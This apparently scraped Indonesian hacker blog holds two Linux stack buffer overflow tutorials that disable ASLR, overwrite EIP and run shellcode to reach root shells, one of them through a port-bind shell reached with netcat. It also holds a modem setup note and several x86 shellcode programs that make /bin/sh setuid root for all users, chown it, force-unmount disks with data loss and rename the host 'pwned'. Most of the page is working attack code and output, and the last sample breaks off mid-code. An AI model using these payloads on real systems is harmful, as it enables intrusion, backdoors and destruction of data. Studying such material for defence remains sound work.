Linux buffer overflow II
Linux Buffer Overflow Tutorial
Edisi : Kedua
Penulis : gunslinger_
Tanggal : Mon Jun 28 21:38:14 WIT 2010
Konten :
1. Pendahuluan
2. Skenario
3. Fungsi getenv()
4. Exploitasi
5. Kesimpulan
6. Special thanks
– Pendahuluan
Pada tutorial edisi pertama saya menjelaskan tutorial buffer overflow berbuffer 400 byte.
anda bisa melihat tutorial sebelumnya disini -> http://www.exploit-db.com/papers/14069/
sekarang saya akan menjelaskan “bagaimana cara jika buffer lebih kecil dari ukuran payload kita terutama shellcode ?”
dan saya akan menjelaskan strateginya pada tutorial ini.
– Skenario
kita bisa lihat source aplikasi sebelumnya mirip pada source aplikasi tutorial ini.
hanya saja yang membedakan buffernya. kali ini aplikasi berbuffer 10 bytes.
sebelum melanjutkan experimen pada skenario tutorial ini, jangan lupa matikan randomisasi stack terlebih dahulu.
root@bt:~# cat /proc/sys/kernel/randomize_va_space 2 root@bt:~# echo 0 > /proc/sys/kernel/randomize_va_space root@bt:~# cat /proc/sys/kernel/randomize_va_space 0 root@bt:~#
———————bof2.c————————–
#include <stdio.h>
#include <string.h>
int main(int argc, char** argv)
{
char buffer[10];
strcpy(buffer, argv[1]);
return 0;
}
———————EOF—————————–
save dengan nama bof2.c ,compile program tersebut .
perhatian : pada saat mengompile tambahkan opsi -fno-stack-protector dan -mpreferred-stack-boundary=2.
root@bt:~# gcc -g -o bof2 -fno-stack-protector -mpreferred-stack-boundary=2 bof2.c
jadi, bagaimana cara pengexploitasiannya jika buffer sekecil itu ?
kita bisa gunakan “ENVIRONMENT VARIABLE” untuk menyimpan nopsled dan shellcode .
lalu kita ulangi address NOP sampai mengoverwrite register EIP.
langkah pertama, kita perlu menaruh shellcode ke bentuk binary.
saya akan gunakan shellcode binding port 13123 pada tutorial ini,
dan anda bisa melihat shellcode tersebut di sini : http://inj3ct0r.com/exploits/12608
root@bt:~/bof# echo -ne "\xeb\x11\x5e\x31\xc9\xb1\x65\x80\x6c\x0e\xff\x35\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x66\xf5\x66\x10\x66\x07\x85\x9f\x36\x9f\x37\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\xbe\xfb\x87\x9d\xf0\x37\x68\x78\xbe\x16\x9f\x45\x86\x8b\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\x87\x8b\xbe\x16\xe8\x39\xe5\x9b\x02\xb5\x87\x87\x8b\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\xbe\xf8\x66\xfe\xe5\x74\x02\xb5\x76\xe5\x74\x02\xb5\x76\xe5\x74\x02\xb5\x87\x9d\x64\x64\xa8\x9d\x9d\x64\x97\x9e\xa3\xbe\x18\x87\x88\xbe\x16\xe5\x40\x02\xb5" > shellcode3.bin root@bt:~/bof# cat shellcode3.bin ë^1ɱelÿ5éuöëèêÿÿÿfõff67¾3øå¾ûð7hx¾E¾3øå¾è9å¾3øå¾øfþåtµvåtµvåtµdd¨d£¾?¾å@µroot@bt:~/bof#
selanjutnya, kita buat “ENVIRONMENT VARIABLE” berisi : 200 bytes NOPSLED + SHELLCODE
root@bt:~/bof# export PAYLOAD=$(perl -e 'print "\x90" x 200')$(cat shellcode.bin) root@bt:~/bof# echo $PAYLOAD ë^1ɱelÿ5éuöëèêÿÿÿfõff67¾3øå¾ûð7hx¾E¾3øå¾è9å¾3øå¾øfþåtµvåtµvåtµdd¨d£¾?¾å@µ root@bt:~/bof#
ok, kita baru saja selesai menaruh PAYLOAD kita di “ENVIRONMENT VARIABLE”.
– Fungsi getenv()
sekarang kita gunakan getenv() pada bahasa c.
fungsi getenv() adalah untuk mendapatkan return address variable environment (get environment variable).
jadi kita menggunakan fungsi tersebut untuk mendapatkan return address PAYLOAD kita sebelumnya pada “ENVIRONMENT VARIABLE”.
dan source aplikasinya seperti berikut .
———————getenv.c————————–
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char** argv)
{
printf("%s terletak pada address %p\n", argv[1], getenv(argv[1]));
return (0);
}
———————EOF—————————–
yah sangat simple bukan?, namun sangat berguna.
lalu compile program tersebut
root@bt:~/bof# gcc -o getenv getenv.c root@bt:~/bof#
sekarang, kita bisa liat dimana alamat PAYLOAD kita berada.
root@bt:~/bof# ./getenv PAYLOAD PAYLOAD terletak pada address 0xbffffe1e root@bt:~/bof#
sudah jelas… kita mengetahui PAYLOAD terletak pada address 0xbffffe1e dengan mudah .
kemudian kita tambahkan, sebut saja 100 bytes karena kita harus menemukan alamat yang terletak dengan alamat pertengahan NOPSLED berada.
root@bt:~/bof# printf "%x\n" $((0xbffffe1e + 100)) bffffe82 root@bt:~/bof#
sudah kita dapatkan 0xbffffe1e + 100 = bffffe82 , lalu kita rubah ke bentuk little endian.
-> 82feffbf
lalu kita ubah ke bentuk shellcode
-> \x82\xfe\xff\xbf
– Eksploitasi
sekarang saatnya kita run PAYLOAD kita pada aplikasi yang vulnerable buffer overflow tersebut .
root@bt:~/bof# ./bof2 $(perl -e 'print "\x82\xfe\xff\xbf" x 10') Segmentation fault root@bt:~/bof#
kita mendapatkan segmentation fault karena kita tidak menggunakan sederetan perulangan address.
lalu bagaimana ? kita bisa gunakan NOP untuk mendorong (push) address dengan cara menaikan byte per byte.
root@bt:~/bof# ./bof2 $(perl -e 'print "\x90" . "\x82\xfe\xff\xbf" x 10') Segmentation fault root@bt:~/bof#
masih mendapatkan segmentation fault, coba kita naikan 1 byte demi byte lagi pada address NOP…
root@bt:~/bof# ./bof2 $(perl -e 'print "\x90" x 2 . "\x82\xfe\xff\xbf" x 10')
OoOoOpsss, program bof tidak exit ? apa yang terjadi ? apa shellcode kita tereksekusi dengan baik ?
sebelumnya kita menggunakan shellcode bindport pada port 13123 ,
coba kita buka tab konsole baru dan sambungkan dengan netcat .
root@bt:~# nc localhost 13123 id uid=0(root) gid=0(root) groups=0(root) whoami root hostname bt echo YUMMY! YUMMY!
kita sudah berhasil lagi dalam mengexploitasi buffer overflow .
– Kesimpulan
kesimpulannya, bahwa seberapa kecil buffer pada aplikasi tetap memungkinkan terjadinya buffer overflow .
untuk mencegah terjadinya buffer overflow adalah dengan cara membatasi seberapa bytes input data yang dimasukan oleh user .
– Special thanks : devilzc0de crew and jasakom crew
: www.devilzc0de.org / www.devilzc0de.com – www.jasakom.com , indonesianhacker.org, yogyacarderlink.web.id
: serverisdown.org, xc0de.or.id, echo.or.id, hacker-newbie.org, tecon-crew.org
: And all exploit database…
Linux Buffer Overflow Tutorial
Linux Buffer Overflow Tutorial
Edisi : Pertama
Penulis : gunslinger_
Tanggal : Sat Jun 26 20:27:41 WIT 2010
Konten :
1. Pendahuluan
2. Konsep exploitasi
3. Attack vector
3.1. NOP
3.2. NOPSLED
3.3. PAYLOAD
4. Special thanks
– Pendahuluan
Setelah saya banyak melakukan penelitian pada kernel linux yang baru – baru ini ,
terutama kernel 2.6.8 ke atas memang tidak mungkin untuk mempraktikan teknik exploitasi buffer overflow dengan cara lama .
maka dari itu saya menulis tutorial ini agar kita bisa mempraktikan “apa itu sebenarnya buffer overflow ?”
pada kernel 2.6.8 ke atas karena kita mendapatkan kernel terbaru pada operting system pada saat ini.
dengan tutorial ini, saya akan menjelaskan secara terperinci menjelaskan teknik exploitasi buffer overflow.
– Konsep Exploitasi buffer overflow
ok, sekarang kita lanjut saja ke topik utama. sekarang kita harus membuat program yang vulnerable terhadap serangan buffer overflow.
———————bof.c————————–
#include <stdio.h>
#include <string.h>
int main(int argc, char** argv)
{
char buffer[400];
strcpy(buffer, argv[1]);
return 0;
}
———————EOF—————————–
kita save dengan nama bof.c .
kita lihat pada source berikut itu bahwa adanya fungsi strcpy() .
fungsi strcpy() sangat berbahaya karena tidak adanya pengecekan filter panjang data yang akan kita input.
ok, sekarang saatnya kita mematikan randomize_va_space memory tujuannya agar kita mudah mengalokasikan memory.
dengan cara seperti berikut.
root@bt:~# cat /proc/sys/kernel/randomize_va_space 2 root@bt:~# echo 0 > /proc/sys/kernel/randomize_va_space root@bt:~# cat /proc/sys/kernel/randomize_va_space 0 root@bt:~#
sekarang saatnya kita meng – compile program tersebut.
perhatian : pada saat mengompile tambahkan opsi -fno-stack-protector dan -mpreferred-stack-boundary=2.
berikut caranya
root@bt:~# gcc -g -o bof -fno-stack-protector -mpreferred-stack-boundary=2 bof.c
sekarang saatnya kita mencari panjang string agar program si program mengalami crash.
root@bt:~# ./bof `perl -e 'print "A" x 400'` root@bt:~# ./bof `perl -e 'print "A" x 403'`
seperti yang kita lihat, data tercopy kedalam buffer dan program exit secara normal.
dimana kita mengkopikan huruf “A” 400 – 403 bytes kedalam buffer.
root@bt:~# ./bof `perl -e 'print "A" x 404'` Segmentation fault root@bt:~#
disitu kita tahu kita membutuhkan 404 panjang string agar si program mengalami crash .
lalu kemudian sekarang yang kita lakukan adalah kita mencari panjang string agar register EIP teroverwrite pada inputan kita.
EIP adalah poin awal dimana instruksi selanjutnya akan tereksekusi, maka jika EIP tersebut kita teroverwrite, kita bisa melakukan apa yang kita mau eksekusi pada saat itu.
sekarang, saatnya kita gunakan GNU debugger atau biasa disebut gdb.
perhatikan pada experiment berikut.
root@bt:~# gdb -q bof
(gdb) list
1 #include <stdio.h>
2 #include <string.h>
3
4 int main(int argc, char** argv)
5 {
6 char buffer[400];
7 strcpy(buffer, argv[1]);
8
9 return 0;
10 }
(gdb) run `perl -e 'print "A" x 404'`
Starting program: /root/bof `perl -e 'print "A" x 404'`
Program received signal SIGSEGV, Segmentation fault.
0xb7e86606 in __libc_start_main () from /lib/tls/i686/cmov/libc.so.6
(gdb) run `perl -e 'print "A" x 405'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/bof `perl -e 'print "A" x 405'`
Program received signal SIGSEGV, Segmentation fault.
0xb7e800a9 in ?? () from /lib/tls/i686/cmov/libc.so.6
(gdb)
hmmm terlihat bahwa kita belum mengoverwritenya kita coba lagi tambahkan 1 string
(gdb) run `perl -e 'print "A" x 406'` The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /root/bof `perl -e 'print "A" x 406'` Program received signal SIGSEGV, Segmentation fault. 0xb7004141 in ?? () (gdb)
ok, disitu sekarang sudah terlihat kita sedikit lagi mengoverwrite total eip.
perhatikan -> 0xb7004141
disitu ada 4141 , 41 adalah huruf “A” dalam bilangan hexadesimal . namun kita perlu mengoverwrite total address EIP tersebut.
(gdb) run `perl -e 'print "A" x 407'` The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /root/bof `perl -e 'print "A" x 407'` Program received signal SIGSEGV, Segmentation fault. 0x00414141 in ?? () (gdb)
sedikit lagi…
(gdb) run `perl -e 'print "A" x 408'` The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /root/bof `perl -e 'print "A" x 408'` Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () (gdb)
disitu terlihat bahwa kita telah mengoverwrite total register EIP.
perhatikan -> 0×41414141
kita sudah berhasil mengoverwritenya dengan huruf “A” dengan panjang string 408.
(gdb) i r eax 0x0 0 ecx 0xbffff0b7 -1073745737 edx 0x199 409 ebx 0xb7fc9ff4 -1208180748 esp 0xbffff250 0xbffff250 ebp 0x41414141 0x41414141 esi 0x8048400 134513664 edi 0x8048310 134513424 eip 0x41414141 0x41414141 <-- ter overwrite !! eflags 0x210246 [ PF ZF IF RF ID ] cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51 (gdb)
sekarang yang perlu kita lakukan adalah dimana keberadaan register ESP (stack pointer).
(gdb) list 1
1 #include <stdio.h>
2 #include <string.h>
3
4 int main(int argc, char** argv)
5 {
6 char buffer[400];
7 strcpy(buffer, argv[1]);
8
9 return 0;
10 }
(gdb) b 7
Breakpoint 1 at 0x80483cd: file bof.c, line 7.
(gdb)
perlu diperhatikan kita perlu menggunakan dimana fungsi vulnerable strcpy() sebagai breakpoint untuk mengetahui dimana keberadaan register ESP.
(gdb) run test to see where esp is The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /root/bof test to see where esp is Breakpoint 1, main (argc=7, argv=0xbffff434) at bof.c:7 7 strcpy(buffer, argv[1]); (gdb) i r esp esp 0xbffff210 0xbffff210 (gdb)
esp terletak pada address 0xbffff210
– Attack vector
ok sekarang bagian pengexploitasinya. kita butuh membuat attack vector untuk pengexploitasiannya.
sekarang yang perlu dimengerti apa itu NOP , NOPSLED, PAYLOAD.
- NOP
pertama saya akan menjelaskan apa itu NOP.
NOP dalam bahasa assembly adalah no-op atau no operation sampai instruksi selanjutnya tereksekusi.
dengan kata lain NOP adalah bagian yang dilewati sampai instruksi yang benar2 tereksekusi.
disini kita pakai NOP untuk melancarkan attack sampai bertemu instruksi yang kita inginkan.
NOP dalam bentuk opcode adalah “90″ atau “\x90″ dalam bentuk shellcode.
- NOPSLED
kedua saya akan menjelaskan apa itu NOPSLED. NOPSLED adalah serentetan yang terdiri dari NOP sampai beberapa bytes.
contoh seperti `perl -e ‘print “\x90″ x 40′`. maka kita akan mendapatkan “x90″ sampai 40 bytes (40 kali).
- PAYLOAD
ketiga saya menjelaskan apa itu PAYLOAD. PAYLOAD adalah serentetan kode yang akan kita eksekusikan.
shellcode adalah sebagai PAYLOAD nya
selanjutnya kita akan memeriksa dimana NOPSLED akan di tempatkan.
kita ulangi address tersebut sampai register EIP teroverwrite.
dan akhirnya memaksa program untuk melanjutkan eksekusi pada alamat NOP.
lalu kita ambil alamat pada register ESP dan kurangi register tersebut. sebut saja bilangan itu 300.
root@bt:~# printf "%x\n" $((0xbffff210-300)) bffff0e4 root@bt:~#
alamat tersebut akan menempatkan kita pada NOPSLED.
sekarang yang kita butuhkan adalah mengkonversi alamat tersebut pada bentuk little endian.
-> e4f0ffbf
lalu kita jadikan ke bentuk shellcode.
-> \xe4\xf0\xff\xbf
sekarang saatnya kita menghitung berapa kali alamat tersebut harus di ulang.
kita tahu bahwa untuk mengoverwrite register EIP kita membutuhkan 408 bytes.
root@bt:~# print "%d\n" $((408 -
kita kurangi dengan panjang NOPSLED kita. panjang NOPSLED kita adalah 200 bytes
root@bt:~# print "%d\n" $((408 - 200
shellcode yang akan kita gunakan shellcode yang akan memberikan shell. kita bisa pakai shellcode berikut :
"\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"
shellcode tersebut berukuran 28 bytes.
dan kurangi 28 bytes untuk shellcode kita.
root@bt:~# printf "%d\n" $((408 - 200 - 28)) 180 root@bt:~#
jadi kita 180 bytes untuk mengulangi alamat tersebut.
karena address memiliki panjang 4 bytes. kita harus membaginya dengan 4.
root@bt:~# printf "%d\n" $((180/4)) 45 root@bt:~#
ok kita telah dapatkan berapa kali yang kita butuhkan untuk mengoverwrite EIP. yaitu 45.
maka payload kita akan seperti berikut :
NOPSLED + SHELLCODE + ESP
`perl -e 'print "\x90" x 200 . "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\x04\xf1\xff\xbf" x 45'`
sekarang saatnya kita run paload kita tersebut langsung saja di debugger.
(gdb) run `perl -e 'print "\x90" x 200 . "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\x04\xf1\xff\xbf" x 45'` Starting program: /root/bof `perl -e 'print "\x90" x 200 . "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\x04\xf1\xff\xbf" x 45'` Breakpoint 1, main (argc=2, argv=0xbffff2d4) at bof.c:7 7 strcpy(buffer, argv[1]); (gdb) continue Continuing. Executing new program: /bin/bash (no debugging symbols found) Error in re-setting breakpoint 1: No symbol table is loaded. Use the "file" command. (no debugging symbols found) Error in re-setting breakpoint 1: No symbol table is loaded. Use the "file" command. (no debugging symbols found) Error in re-setting breakpoint 1: No symbol table is loaded. Use the "file" command. (no debugging symbols found) Error in re-setting breakpoint 1: No symbol table is loaded. Use the "file" command. (no debugging symbols found) Error in re-setting breakpoint 1: No symbol table is loaded. Use the "file" command. (no debugging symbols found) Error in re-setting breakpoint 1: No symbol table is loaded. Use the "file" command. (no debugging symbols found) Error in re-setting breakpoint 1: No symbol table is loaded. Use the "file" command. (no debugging symbols found) Error in re-setting breakpoint 1: No symbol table is loaded. Use the "file" command. (no debugging symbols found) Error in re-setting breakpoint 1: No symbol table is loaded. Use the "file" command. sh-3.2# id uid=0(root) gid=0(root) groups=0(root) sh-3.2# echo WIN. WIN. sh-3.2# exit Program exited normally. (gdb) quit root@bt:~#
selamat ! anda telah sukses mengexploitasi buffer overflow !
– special thanks : devilzc0de crew and jasakom crew
: www.devilzc0de.org / www.devilzc0de.com – www.jasakom.com , indonesianhacker.org, yogyacarderlink.web.id
: serverisdown.org, xc0de.or.id, echo.or.id
cara setting telkomflash di backtrack
yah biar penulis juga ga lupa suatu saat nanti maka ga ada salahnya juga ditulis di mari hehehe…
ok berikut adalah langkah langkahnya…
pertama buka konsole
lalu ketik : sudo kate /etc/wvdial.conf
lalu ganti semua dan overwrite dengan script di bawah .
[Dialer Defaults] Init1 = ATZ Init2 = ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 Init3 = AT+CGDCONT=1, \"IP\", \"internet\" Modem Type = USB Modem ISDN = 0 New PPPD = yes Phone = *99# Modem = /dev/ttyUSB0 Username = PPP Password = PPP Baud = 3600000 Auto DNS = 1
ok setelah itu save atau simpan.
lalu check dengan ketik : cat /etc/wvdial.conf
lalu kita akan mendapat seperti ini…
root@bt:/etc# cat wvdial.conf [Dialer Defaults] Init1 = ATZ Init2 = ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 Init3 = AT+CGDCONT=1, \"IP\", \"internet\" Modem Type = USB Modem ISDN = 0 New PPPD = yes Phone = *99# Modem = /dev/ttyUSB0 Username = PPP Password = PPP Baud = 3600000 Auto DNS = 1
ok berarti sudah benar perlu di perhatikan lakukanlah semua yang di tutorial ini dengan root atau sudo
lalu saatnya kita sambungkan koneksi kita. dengan mengetik : wvdial &
perhatian : jangan lupa dengan tanda dengan (&) agar wvdial yang kita jalankan tadi berjalan di background agar jika kita menutup konsole si wvdial tidak ikut tertutup .
ok berikut setelah kita mengetik wvdial & di konsole.
root@bt:~# wvdial & [1] 6024 WvDial: Internet dialer version 1.60 --> Cannot get information for serial port. --> Initializing modem. --> Sending: ATZ ATZ OK --> Sending: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 OK --> Sending: AT+CGDCONT=1, "IP", "internet" AT+CGDCONT=1, "IP", "internet" OK --> Modem initialized. --> Sending: ATDT*99# --> Waiting for carrier. ATDT*99# CONNECT --> Carrier detected. Waiting for prompt. root@bt:~# --> Don't know what to do! Starting pppd and hoping for the best. --> Starting pppd at Thu Jun 24 13:08:50 2010 --> Pid of pppd: 6025 --> pppd: 0õÎ[08][08]øÎ[08]XøÎ[08] --> Using interface ppp0 --> pppd: 0õÎ[08][08]øÎ[08]XøÎ[08] --> pppd: 0õÎ[08][08]øÎ[08]XøÎ[08] --> pppd: 0õÎ[08][08]øÎ[08]XøÎ[08] --> pppd: 0õÎ[08][08]øÎ[08]XøÎ[08] --> pppd: 0õÎ[08][08]øÎ[08]XøÎ[08] --> pppd: 0õÎ[08][08]øÎ[08]XøÎ[08] --> local IP address 182.1.204.151 --> pppd: 0õÎ[08][08]øÎ[08]XøÎ[08] --> remote IP address 10.64.64.64 --> pppd: 0õÎ[08][08]øÎ[08]XøÎ[08] --> primary DNS address 114.127.208.84 --> pppd: 0õÎ[08][08]øÎ[08]XøÎ[08] --> secondary DNS address 202.3.208.11 --> pppd: 0õÎ[08][08]øÎ[08]XøÎ[08] root@bt:~#
pada saat tersebut maka flash kita akan menyala . tidak berkedip – kedip lagi menandakan kita sudah terkoneksi ke internet .
ok di situ juga di jelaskan kita menggunakan koneksi modem (ppp0) dengan menggunakan ip 182.1.204.151 dan remote ipnya 10.64.64.64 . DNS utama : 114.127.208.84 dan DNS kedua : 202.3.208.11
ok anda bisa langsung menutup konsole anda dan buka browser . selamat berinternetan !
program setreuid 0,0 ~ execve(‘/bin/sh’,”,”) ~ exit()
berikut adalah shell dengan setreuid 0,0 dengan bahasa assembly…
; program setreuid 0,0 ~ sysexecve('/bin/sh','','') ~ exit()
; programmer gunslinger_ <yudha.gunslinger@gmail.com>
global _start
_start:
nop ; no operasi ;syscall sys_setreuid(uid_t,uid_t)
xor eax, eax ; bersihkan register eax ;
mov al,70 ; syscall nomer 70 setreuid ;
mov ecx, edx ; edx kosong, lalu kopikan ke ecx jadi ecx kosong ;
int 0x80 ; interupsi kernel, kerjakan ! ;
jmp short end ; loncat tanpa kondisi ke end >-------------------------------------------------------------------+
|
start: ; start terpanggil <--------------------------------------------------------------------------+ |
nop ; no operasi | |
mov al,11 ; syscall nomer 11 execve | | ;syscall sys_execve(args1,args2,args3)
pop ebx ; ambil dari stack<--------------------------------------------------------------------------------------------------------+ ;
mov ecx, edx ; edx kosong, lalu kopikan ke register ecx jadi ecx kosong | | | ;
int 0x80 ; interupsi kernel, kerjakan ! | | | ;
| | |
xor eax, eax ; bersihkan register ecx | | | ;syscall exit()
inc eax ; increment eax, atau tambah eax 1 karena nilai eax 0 jadi eax menjadi 1 syscall nomer 1 exit | | | ;
int 0x80 ; interupsi kernel, kerjakan ! | | | ;
| | |
end: ; label start <-----------------------------------------------------------------------------------+ |
call start ; panggil start >-----------------------------------------------------------------------------+ |
db '/bin/sh' ; masukan string '/bin/sh' ke stack >--------------------------------------------------------------------------------------+
kompile dengan
gunslinger@c0debreaker:~$ nasm -f elf shell.asm gunslinger@c0debreaker:~$ ld -s -o shell shell.o
lalu beri suid root
gunslinger@c0debreaker:~$ sudo chown root:root shell [sudo] password for gunslinger: gunslinger@c0debreaker:~$ sudo chmod 4755 shell gunslinger@c0debreaker:~$ ./shell #
anda sudah mempunyai shell dengan akses root (suid root)
92 bytes displaying system temperature x86 linux shellcode
/*
Name : 92 bytes displaying system temperature x86 linux shellcode
Date : may, 31 2009
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web : devilzc0de.com
blog : gunslingerc0de.wordpress.com
tested on : linux debian
special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (exploit-db.com)
greetz to : flyff666, whitehat, ketek, chaer, peneter, cruz3n and all devilzc0de crew
*/
#include <stdio.h>
char *shellcode=
"\x60\x31\xc0\x31\xd2\xb0\x0b\x52\x68\x6e\x2f"
"\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x68"
"\x2d\x63\x63\x63\x89\xe1\x52\xeb\x07\x51\x53"
"\x89\xe1\xcd\x80\x61\xe8\xf4\xff\xff\xff\x2f"
"\x62\x69\x6e\x2f\x63\x61\x74\x20\x2f\x70\x72"
"\x6f\x63\x2f\x61\x63\x70\x69\x2f\x74\x68\x65"
"\x72\x6d\x61\x6c\x5f\x7a\x6f\x6e\x65\x2f\x54"
"\x48\x52\x4d\x2f\x74\x65\x6d\x70\x65\x72\x61"
"\x74\x75\x72\x65";
int main()
{
fprintf(stdout,"Length: %d\n",strlen(shellcode));
(*(void (*)()) shellcode)();
return 0;
}
48 bytes chown root:root /bin/sh x86 linux shellcode
Name : 48 bytes chown root:root /bin/sh x86 linux shellcode
Date : Sat Jun 5 15:32:40 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web : http://devilzc0de.org
blog : http://gunslingerc0de.wordpress.com
tested on : linux debian
special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org)
greetz to : flyff666, whitehat, ketek, chaer, peneter, and all devilzc0de crew
*/
#include <stdio.h>
char *shellcode=
"\xeb\x13" /* jmp 0x8048075 */
"\x31\xc0" /* xor %eax,%eax */
"\xb0\xb6" /* mov $0xb6,%al */
"\x5b" /* pop %ebx */
"\x31\xc9" /* xor %ecx,%ecx */
"\x31\xd2" /* xor %edx,%edx */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xor %eax,%eax */
"\xb0\x01" /* mov $0x1,%al */
"\x31\xdb" /* xor %ebx,%ebx */
"\xcd\x80" /* int $0x80 */
"\xe8\xe8\xff\xff\xff" /* call 0x8048062 */
"\x2f" /* das */
"\x68\x6f\x6d\x65\x2f" /* push $0x2f656d6f */
"\x67\x75\x6e" /* addr16 jne 0x80480f1 */
"\x73\x6c" /* jae 0x80480f1 */
"\x69\x6e\x67\x65\x72\x2f\x73"/* imul $0x732f7265,0x67(%esi),%ebp */
"\x68" /* .byte 0x68 */
"\x65" /* gs */
"\x6c" /* insb (%dx),%es "(%edi) */
"\x6c"; /* insb (%dx),%es "(%edi) */
int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(shellcode));
((void (*)(void)) shellcode)();
return 0;
}
45 bytes give all user root access when execute /bin/sh x86 linux shellcode
/*
Name : 45 bytes give all user root access when execute /bin/sh x86 linux shellcode
Date : Sat Jun 5 16:10:00 2010
Author : gunslinger_
Web : http://devilzc0de.org
blog : http://gunslingerc0de.wordpress.com
tested on : linux debian
special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org)
greetz to : flyff666, whitehat, ketek, chaer, peneter, cruz3n and all devilzc0de crew
*/
#include
char *shellcode=
"\xeb\x1f" /* jmp 0x8048081 */
"\x31\xc0" /* xor %eax,%eax */
"\xb0\xb6" /* mov $0xb6,%al */
"\x5b" /* pop %ebx */
"\x31\xc9" /* xor %ecx,%ecx */
"\x31\xd2" /* xor %edx,%edx */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xor %eax,%eax */
"\xb0\x0f" /* mov $0xf,%al */
"\x89\xdb" /* mov %ebx,%ebx */
"\x66\xb9\xed\x09" /* mov $0x9ed,%cx */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xor %eax,%eax */
"\xb0\x01" /* mov $0x1,%al */
"\x31\xdb" /* xor %ebx,%ebx */
"\xcd\x80" /* int $0x80 */
"\xe8\xdc\xff\xff\xff" /* call 0x8048062 */
"\x2f" /* das */
"\x62\x69\x6e" /* bound %ebp,0x6e(%ecx) */
"\x2f" /* das */
"\x73\x68"; /* jae 0x80480f5 */
int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(shellcode));
((void (*)(void)) shellcode)();
return 0;
}
45 bytes sys_execve(“/bin/sh”, “0″, “0″) with umask 16 (sys_umask(14)) x86 linux shellcode
/*
Name : 45 bytes sys_execve("/bin/sh", "0", "0") with umask 16 (sys_umask(14)) x86 linux shellcode
Date : may, 31 2010
Author : gunslinger_
Web : devilzc0de.com
blog : gunslinger.devilzc0de.com
tested on : linux debian
*/
int main(){
char shell[] = "\x31\xc0\x31\xdb\x31\xdb\x31\xd2\x31"
"\xc9\xb0\x3c\x31\xdb\xb3\x0e\xcd\x80"
"\xeb\x0b\x5b\x31\xc0\x31\xc9\x31\xd2"
"\xb0\x0b\xcd\x80\xe8\xf0\xff\xff\xff"
"\x2f\x62\x69\x6e\x2f\x73\x68";
(*(void (*)()) shell)();
}
force unmount “/media/disk” x86 linux shellcode (some data cause lost)
/*
Title : force unmount "/media/disk" x86 linux shellcode (some data cause lost)
Name : 33 bytes force unmount "/media/disk" linux x68 shellcode
Date : Fri Jun 4 13:15:51 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web : http://devilzc0de.org
blog : http://gunslingerc0de.wordpress.com
tested on : linux debian
special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org)
greetz to : flyff666, whitehat, ketek, chaer, peneter, and all devilzc0de crew
*/
#include <stdio.h>
char *shellcode=
"\xeb\x0f" /* jmp 0x8048071 */
"\x31\xc0" /* xor %eax,%eax */
"\xb0\x34" /* mov $0x34,%al */
"\x5b" /* pop %ebx */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xor %eax,%eax */
"\xb0\x01" /* mov $0x1,%al */
"\x31\xdb" /* xor %ebx,%ebx */
"\xcd\x80" /* int $0x80 */
"\xe8\xec\xff\xff\xff" /* call 0x8048062 */
"\x2f" /* das */
"\x6d" /* insl (%dx),%es:(%edi) */
"\x65\x64\x69\x61\x2f\x64\x69"/* imul $0x6b736964,%fs:%gs:0x2f(%ecx),%esp */
"\x73\x6b";
int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(shellcode));
((void (*)(void)) shellcode)();
return 0;
}
sethostname “pwned !!” x86 linux shellcode
/*
Title : sethostname "pwned !!"
Name : 32 bytes sys_sethostname("PwNeD !!",8) x86 linux shellcode
Date : may, 31 2009
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web : devilzc0de.com
blog : gunslingerc0de.wordpress.com
tested on : linux debian
*/
#include <stdio.h>
char *shellcode=
"\xeb\x11" /* jmp 0x8048073 */
"\x31\xc0" /* xor %eax,%eax */
"\xb0\x4a" /* mov $0x4a,%al */
"\x5b" /* pop %ebx */
